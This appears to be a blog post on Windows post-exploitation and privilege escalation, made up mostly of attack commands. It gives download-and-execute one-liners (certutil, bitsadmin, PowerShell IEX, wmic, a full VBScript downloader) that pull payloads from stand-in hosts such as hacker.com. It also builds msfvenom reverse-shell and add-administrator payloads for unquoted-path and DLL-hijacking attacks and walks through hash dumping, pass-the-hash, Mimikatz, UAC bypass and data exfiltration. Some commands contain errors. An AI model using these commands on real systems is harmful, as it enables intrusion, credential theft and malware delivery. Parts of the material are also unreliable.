Windows Manual Escalation
Introduction
In this blog post, we will discuss some manual techniques to escalate privileges according to get standard privileges in the target network.
Windows File Transfer utilities
We will discuss some utilities to download remote payloads and execute them in order to perform malicious action, in the target system.
Certutil
Certutil is a CLI program that can be used to dump and display certificate authority (CA), configuration information, configures Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains. It is installed as a part of Certificate Services.
How can we use it to download malicious files and evade antivirus in the target system
Simple command to download malicious files and payloads from a remote server.
You can create payloads using msfvenom, veil, evilgrade or other tools
certutil -urlcache -split -f http://hacker.com/malicious.exe malicious.exe
-URLCache: To display or delete URL cache entries
-split: To split embedded ASN.1 element & Save to files
-f: Force Overwrite
To download encrypted payload from a remote server in target and executing it as .exe.
certutil -urlcache -split -f http://webserver/malicious.b64 malicious.b64 & certutil -decode malicious.b64 malicious.exe & malicious.exe
Download encoded payload, decoding it, and combining some commands in one line, with the InstallUtil.exe executing a specific DLL as a payload.
certutil -urlcache -split -f http://hacker/malicious.b64 malicious.b64 & certutil -decode malicious.b64 malicious.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u malicious.dll
Bitsadmin
Background Intelligent Transfer Service is a component of Microsoft Windows XP and later iterations of the operating systems, which facilitate asynchronously, prioritized, and throttled transfer of files between machines using idle network bandwidth.
To download files from remote server
bitsadmin /transfer hacker http://hacker.com/evil.pe c:\System32\evil.exe
We can also execute payload using bitsadmin
bitsadmin /addfile hacker http://hacker.com/evil.pe c:\System32\evil.exe
bitsadmin /SetNotifyCmdLine evil.exe /complete hacker | start /B C:\evil.exe"
Cscript
cscript.exe is a Microsoft (r) Console Based Script Host from Microsoft Corporation belonging to Microsoft (r) Windows Script Host. With Cscript.exe, you can run scripts by typing the name of a script file at the command prompt.
cscript //E:jscript \\webdavserver\folder\payload.txt
Create Vbs file for wget VbScript wget.vbs
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs echo ts.Close >> wget.vbs
And execute it
cscript wget.vbs http://attackerIP/hacker.exe hacker.exe
** Powershell IEX**
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
Wmic
wmic os get /format:"https://hacker/hacker.xsl"
SMB
smbclient //server/share -c 'cd c:/remote/path ; put local-file remote-file'
Starting the server in attacker linux using impacket
smbserver.py shareName sharePath
In the windows target machine
C:\>net use /d \\[host]\[share name]
If you’re in meterpreter shell, you can do many things very easily, it has many commands and run modules
To see commands in meterpreter
help
To see run commands
run <Tab> <Tab>
To upload payload or malicious files in windows system by meterpreter
upload <filename>
There are many other utilities also that we can use to transfer files in windows system
After Exploitation and PostEnumeration, the questions arises what we found
- Had we found any kernel exploit for the target system?
- Had we found Unquoted Service Paths?
- Had we found credentials or hashes?
- Had we found any service running on the localhost?
- Had we found a public exploit for any service?
- Had we found Insecure Registry permissions?
- Had we found sessions VNC/RDP/Citrix so that we can try UAC bypasses?
- what permissions we have?
- ETC.
Migrate meterpreter shell to another process
To migrate your current meterpreter session to another process to establish a stable session
run post/windows/manage/migrate
Or in meterpreter shell
migrate <PID>
Easy Way To get a system shell
In meterpreter shell, there is a command by which you can get system shell simple
getsystem
It tries all available techniques to get system shell on the target system.
To specify a particular technique
getsystem -t 1
Here ‘-t’ is for techniques
Exploit Unquoted Path Service
This technique is used to exploit PE(Portable Executable) that has a space in the filename and the file name is not enclosed in quote tags (“”) and we have write permissions, we can also replace that executable.
First, we have to enter windows shell to execute cmd commands
shell
After enumerating an Unquoted Path Service using Post Enumeration Command
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
And we have found a service name ‘Exploitme.exe’
We will create a msfvenom payload to replace that vulnerable PE
msfvenom -p windows/meterpreter/reverse_tcp lhost=<AttackerIP> lport=<port> prependmigrate=true prependmigrateprocess=explorer.exe -f exe > /root/home/Desktop/Exploitme.exe
Or we can also create a payload to directly change a user to administrator
msfvenom -p windows/exec CMD='net localgroup administrators boss /add' -f exe > /root/home/Desktop/Exploitme.exe
In target shell
move Exploitme.exe Exploitme.exe.1
upload /root/Desktop/Exploitme.exe
reboot
or
sc stop "Exploitme.exe"
sc start "Exploitme.exe"
And start your multi/handler listener to get system shell
use exploit/multi/handler
msf exploit(multi/handler) set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost <targetIP>
msf exploit(multi/handler) set lport <port>
msf exploit(multi/handler) exploit
DLL Hijacking
Whenever an application started in windows it looks for DLL’s(Dynamic link libraries) because it contains data, code, or resources needed for the running of applications.
Whenever application look need to load DLL, it will look for
- The directory from which the application is loaded
- C:\Windows\System32
- C:\Windows\System
- C:\Windows
- The current working directory
- Directories in the system PATH environment variable
- Directories in the user PATH environment variable
What if we replace our malicious DLL in the path, whenever application looks for DLL, it will execute malicious payload DLL that will give us a reverse shell.
First, we have to identify the case of a process in which an application looks for executables using process monitor tool
We got a service name ‘Hijackme.exe’ which is looking for hacker.dll
Let’s exploit DLL hijacking
Create a DLL payload using msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<AttackerIP> -f dll>hacker.dll
upload payload on the target system and locate it in the dll way.
After that start multi/handler on attacker system and exploit.
Boom!!!
You will get a shell as an administrator.
Using meterpreter there is also a feature called ‘Incoginito’ we can impersonate other valid user tokens on that machine and become that user.
In meterpreter shell use command below
use incoginito
UAC Bypass Using Meterpreter
User Account Control or UAC for short is a security feature of Windows which helps prevent unauthorized changes to the operating system.
Let’s check UAC enabled or not on the target system
Use metasploit module
post/windows/gather/win_privs
After confirming let’s bypass it.
search bypassuac
There are many exploits choose as per your requirement
exploit/windows/local/bypassuac_comhijack
Set options and exploit and you will get a shell as admin
Pass The Hash
Pass The Hash is the technique by which you can exploit a sytem directly by its LM Hash.
If you’re in meterpreter shell you can run commands below
run hashdump
or smarthashdump like
post/windows/gather/smart_hashdump
Or you can search another technique in metasploit
search hashdump
Choose what you need
And if you are in regular netcat or cryptcat shell upload secretdump.py, Impacket’s module and execute it on the target system, it will get you hash.
Now you can use psexec.py and wmiexec.py to get system access, please check impacket blogpost to know this approach..
Metasploit also have psexec, search for it set options and exploit it.
You will also can get rdp access using hash.
xfreerdp
Check xfreerdp in your system or install it.
xfreerdp --help
And use pass the hash technique
xfreerdp /u:victim /d:Target /pth: <HASH> /v:<victimIP>
We can also use Mimikatz which allows us to extract plaintext password, Kerberos tickets, perform pass-the-hash attacks, and much more.
You can also load it on meterpreter shell
load mimikatz
And run
wdigest
Evil-WinRM https://github.com/Hackplayers/evil-winrm
This shell is the ultimate WinRM shell for hacking/pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system adminsitrators. This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.
Feature
- Compatible to Linux and Windows client systems
- Load in memory Powershell scripts
- Load in memory dll files bypassing some AVs
- Load in memory C# (C Sharp) assemblies bypassing some AVs
- Load x64 payloads generated with awesome donut technique
- AMSI Bypass
- Pass-the-hash support
- Kerberos auth support
- SSL and certificates support
- Upload and download files showing progress bar
- List remote machine services without privileges
- Command History
- WinRM command completion
- Local files completion
- Colorization on prompt and output messages (can be disabled optionally)
- Docker support (prebuilt images available at Dockerhub)
- Trap capturing to avoid accidental shell exit on Ctrl+C
Usage: evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]
-i, --ip IP Remote host IP or hostname (required)
-P, --port PORT Remote host port (default 5985)
-u, --user USER Username (required)
-p, --password PASS Password
-s, --scripts PS_SCRIPTS_PATH Powershell scripts path (required)
-e, --executables EXES_PATH C# executables path (required)
-U, --url URL Remote url endpoint (default /wsman)
-V, --version Show version
-h, --help Display this help message
Installation
gem install evil-winrm
Usage
$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'
Using hash
$ evil-winrm -i 192.168.1.100 -u Administrator -H<LM_HASH>
After getting sucsessfull admin access gather information about system as much you can run arp
and route
commands for network mapping, use metasploit /post/gather modules to exfiltrate data from the target system.
Gather everything what you can
Conclusion
In this blog post we have discussed some basic windows post-exploitation techniques, more we will learn in Red Teaming series